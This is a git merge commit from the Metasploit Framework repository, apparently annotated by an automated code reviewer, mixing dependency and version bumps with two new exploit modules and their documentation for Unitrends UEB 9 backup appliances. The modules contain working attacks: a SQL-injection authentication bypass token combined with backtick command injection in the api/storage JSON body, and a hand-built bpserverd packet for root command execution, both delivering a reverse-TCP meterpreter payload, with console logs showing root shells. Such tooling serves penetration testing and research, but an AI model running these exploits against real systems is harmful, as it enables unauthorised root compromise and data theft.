Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec

bug/bundler_fix
mumbai 2017-10-20 20:13:29 -04:00
commit 2e376a1b6a
12 changed files with 390 additions and 28 deletions


@ -19,8 +19,10 @@ group :development do
# module documentation # module documentation
gem 'octokit' gem 'octokit'
# Metasploit::Aggregator external session proxy # Metasploit::Aggregator external session proxy
# Disabled for now for crypttlv updates gem 'metasploit-aggregator' if [
# gem 'metasploit-aggregator' 'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end end
group :development, :test do group :development, :test do
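Review bot: The re-enabled `gem 'metasploit-aggregator'` line carries no version constraint, so only Gemfile.lock (1.0.0 in this commit) pins it while the Gemfile itself accepts any future release of a gem that, per the lock, pulls in grpc, google-protobuf, googleauth and signet. Since the gem is already resolved at 1.0.0, `gem 'metasploit-aggregator', '~> 1.0' if ...` would keep the Gemfile honest about the accepted range. The inline platform list would also read better as a literal, `%w[x86-mingw32 x64-mingw32 x86_64-linux x86-linux darwin].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))`; whether the `gsub` normalisation covers every platform string Bundler may see (e.g. musl or gnu-suffixed Linux triples) is not something this hunk shows. The enclosing `group :development` block starts before the hunk.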


@ -1,7 +1,7 @@
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.16.12) metasploit-framework (4.16.13)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -104,13 +104,14 @@ GEM
arel (6.0.4) arel (6.0.4)
arel-helpers (2.5.0) arel-helpers (2.5.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
backports (3.10.0) backports (3.10.3)
bcrypt (3.1.11) bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0) bcrypt_pbkdf (1.0.0)
bindata (2.4.1) bindata (2.4.1)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
coderay (1.1.2) coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.2) crass (1.0.2)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.2) dnsruby (1.60.2)
@ -126,15 +127,40 @@ GEM
ffi (1.9.18) ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.5) fivemat (1.3.5)
google-protobuf (3.4.1.1)
googleapis-common-protos-types (1.0.0)
google-protobuf (~> 3.0)
googleauth (0.5.3)
faraday (~> 0.12)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.6.7)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (~> 0.5.1)
hashery (2.1.2) hashery (2.1.2)
i18n (0.8.6) i18n (0.9.0)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2) jsobfu (0.4.2)
rkelly-remix rkelly-remix
json (2.1.0) json (2.1.0)
jwt (1.5.6)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.1.1) loofah (2.1.1)
crass (~> 1.0.2) crass (~> 1.0.2)
nokogiri (>= 1.5.9) nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3) metasm (1.0.3)
metasploit-aggregator (1.0.0)
grpc
rex-arch
metasploit-concern (2.0.5) metasploit-concern (2.0.5)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -168,6 +194,7 @@ GEM
mini_portile2 (2.3.0) mini_portile2 (2.3.0)
minitest (5.10.3) minitest (5.10.3)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.2.0) net-ssh (4.2.0)
@ -179,6 +206,7 @@ GEM
sawyer (~> 0.8.0, >= 0.5.3) sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1) openssl-ccm (1.2.1)
openvas-omp (0.0.4) openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13) packetfu (1.1.13)
pcaprub pcaprub
patch_finder (1.0.2) patch_finder (1.0.2)
@ -195,7 +223,7 @@ GEM
activerecord (>= 4.0.0) activerecord (>= 4.0.0)
arel (>= 4.0.1) arel (>= 4.0.1)
pg_array_parser (~> 0.0.9) pg_array_parser (~> 0.0.9)
pry (0.11.1) pry (0.11.2)
coderay (~> 1.1.0) coderay (~> 1.1.0)
method_source (~> 0.9.0) method_source (~> 0.9.0)
public_suffix (3.0.0) public_suffix (3.0.0)
@ -271,29 +299,29 @@ GEM
rex-zip (0.1.3) rex-zip (0.1.3)
rex-text rex-text
rkelly-remix (0.0.7) rkelly-remix (0.0.7)
rspec (3.6.0) rspec (3.7.0)
rspec-core (~> 3.6.0) rspec-core (~> 3.7.0)
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.7.0)
rspec-core (3.6.0) rspec-core (3.7.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-expectations (3.6.0) rspec-expectations (3.7.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-mocks (3.6.0) rspec-mocks (3.7.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-rails (3.6.1) rspec-rails (3.7.1)
actionpack (>= 3.0) actionpack (>= 3.0)
activesupport (>= 3.0) activesupport (>= 3.0)
railties (>= 3.0) railties (>= 3.0)
rspec-core (~> 3.6.0) rspec-core (~> 3.7.0)
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.7.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-rerun (1.1.0) rspec-rerun (1.1.0)
rspec (~> 3.0) rspec (~> 3.0)
rspec-support (3.6.0) rspec-support (3.7.0)
ruby-rc4 (0.1.5) ruby-rc4 (0.1.5)
ruby_smb (0.0.18) ruby_smb (0.0.18)
bindata bindata
@ -304,6 +332,11 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
signet (0.8.1)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.15.1) simplecov (0.15.1)
docile (~> 1.1.0) docile (~> 1.1.0)
json (>= 1.8, < 3) json (>= 1.8, < 3)
@ -332,6 +365,7 @@ PLATFORMS
DEPENDENCIES DEPENDENCIES
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator
metasploit-framework! metasploit-framework!
octokit octokit
pry pry


@ -0,0 +1,42 @@
## Vulnerable Application
Unitrends UEB 9 http api/storage remote root
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE.
## Verification Steps
1. ```use exploit/linux/http/ueb9_api_storage ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress - 19.83% done (164/827 bytes)
[*] Command Stager progress - 39.30% done (325/827 bytes)
[*] Command Stager progress - 57.44% done (475/827 bytes)
[*] Command Stager progress - 75.45% done (624/827 bytes)
[*] Command Stager progress - 93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```


@ -0,0 +1,72 @@
## Vulnerable Application
Unitrends UEB 9 bpserverd authentication bypass RCE
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: `?A,Connect36092`
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
## Verification Steps
1. ```use exploit/linux/misc/ueb9_bpserverd ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```


@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.16.12" VERSION = "4.16.13"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash


@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient
# Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}. # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
# #
# @return (see Rex::Proto::Http::Client#send_recv)) # @return (see Rex::Proto::Http::Client#send_recv))
def send_request_cgi(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20, disconnect = true)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout'] actual_timeout = datastore['HttpClientTimeout']
else else
@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20) print_line('#' * 20)
print_line(res.to_terminal_output) print_line(res.to_terminal_output)
end end
disconnect(c) disconnect(c) if disconnect
res res
rescue ::Errno::EPIPE, ::Timeout::Error => e rescue ::Errno::EPIPE, ::Timeout::Error => e
print_line(e.message) if datastore['HttpTrace'] print_line(e.message) if datastore['HttpTrace']
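Review bot: The new `disconnect = true` parameter shadows the `disconnect(c)` method called on the `disconnect(c) if disconnect` line; this only works because the call carries an argument, so a later edit that drops the parens would silently test the local instead of closing the socket. A name that does not collide, e.g. `def send_request_cgi(opts={}, timeout = 20, auto_disconnect = true)`, avoids the trap without changing the positional interface. The YARD block above the signature in the first hunk is not updated for the new parameter; add `# @param disconnect [Boolean] when false the connection is left open after the response is returned`. Whether `c` is still closed on the `::Errno::EPIPE`/`::Timeout::Error` path when the flag is false cannot be seen here, as send_request_cgi's body continues outside the hunk.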


@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver
when "prompt" when "prompt"
update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
when "promptchar" when "promptchar"
update_prompt(framework.datastore['Prompt'], val, true) update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true)
end end
end end


@ -0,0 +1,93 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB 9 http api/storage remote root',
'Description' => %q{
It was discovered that the api/storage web interface in Unitrends Backup (UB)
before 10.0.0 has an issue in which one of its input parameters was not validated.
A remote attacker could use this flaw to bypass authentication and execute arbitrary
commands with root privilege on the target system.
},
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave' # @iotennui
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
['CVE', '2017-12478'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => true
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
])
deregister_options('SRVHOST', 'SRVPORT')
end
#substitue some charactes
def filter_bad_chars(cmd)
cmd.gsub!("\\", "\\\\\\")
cmd.gsub!("'", '\\"')
end
def execute_command(cmd, opts = {})
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
session = Base64.strict_encode64(session) #b64 encode session token
#substitue the cmd into the hostname parameter
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
res = send_request_cgi({
'uri' => '/api/storage',
'method' => 'POST',
'ctype' => 'application/json',
'encode_params' => false,
'data' => parms,
'headers' =>
{'AuthToken' => session}
})
if res && res.code != 500
fail_with(Failure::UnexpectedReply,'Unexpected response')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 120)
end
end
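Review bot: `filter_bad_chars` returns the value of its last `gsub!`, which is nil when `cmd` contains no `'`, so `parms << filter_bad_chars(cmd)` in `execute_command` raises a TypeError in that case, and both `gsub!` calls mutate the caller's `cmd` as a side effect. The non-mutating `cmd.gsub("\\", "\\\\\\").gsub("'", '\\"')` always returns a String and leaves the argument untouched. The `if res && res.code != 500` guard also lets a nil response (no reply at all) fall through without `fail_with`, which presumably is not intended; `unless res && res.code == 500` would make the expectation explicit. The comment typos ("substitue", "charactes") are worth a pass as well.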


@ -0,0 +1,119 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',
'Description' => %q{
It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
},
'Author' =>
[
'Jared Arave', # @iotennui
'Cale Smith', # @0xC413
'Benny Husted' # @BennyHusted
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
['CVE', '2017-12477'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => false
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(1743)
])
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned
bpd_port = buf1[-8..-3].to_i
#check if it's a valid port number (1-65534)
if bpd_port && bpd_port >= 1 && bpd_port <= 65535
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def execute_command(cmd, opts = {})
#append a comment, ignore everything after our cmd
cmd = cmd + " #"
# build the attack buffer...
command_len = cmd.length + 3
packet_len = cmd.length + 23
data = "\xa5\x52\x00\x2d"
data << "\x00\x00\x00"
data << packet_len
data << "\x00\x00\x00"
data << "\x01"
data << "\x00\x00\x00"
data << "\x4c"
data << "\x00\x00\x00"
data << command_len
data << cmd
data << "\x00\x00\x00"
begin
print_status("Connecting to xinetd for bpd port...")
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned, we will connect back on this port to send our cmd
bpd_port = buf1[-8..-3].to_i
print_good("bpd port recieved: #{bpd_port}")
vprint_status("Connecting to #{bpd_port}")
s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
vprint_good('Connected!')
print_status('Sending command buffer to xinetd')
s1.put(data)
s2.get_once(-1,1).to_s
disconnect(s1)
disconnect(s2)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
end
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 200)
end
end
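Review bot: `check` opens a socket with `connect(global = false)` and never closes it, so every check call leaks a connection; `execute_command` has the same gap on its error path, where `s1` stays open if the second `connect` or the `get_once` raises and the rescue jumps to `fail_with`. Ending `check` with `ensure` / `disconnect(s1) if s1` (and doing the same for `s1`/`s2` in `execute_command`) closes them on every exit. `connect(global = false)` and `connect(global = false, opts = {'RPORT'=>bpd_port})` also assign throwaway locals inside the argument list; `connect(false)` and `connect(false, 'RPORT' => bpd_port)` express the same calls without the assignments. In `check`, `bpd_port &&` is always true because `to_i` returns an Integer, and the comment's "1-65534" disagrees with the `<= 65535` test on the next line.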


@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
update_info( update_info(
info, info,
'Name' => 'Polycom Command Shell Authorization Bypass', 'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass', 'Alias' => 'polycom_hdx_auth_bypass',
'Author' => 'Author' =>
[ [
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module


@ -494,7 +494,7 @@ class MetasploitModule < Msf::Exploit::Remote
].pack('v') ].pack('v')
else else
fail_with(Failure::NoTarget, "Unknown target #{targetr['Method']}") fail_with(Failure::NoTarget, "Unknown target #{target['Method']}")
end end
# Build the ANI file # Build the ANI file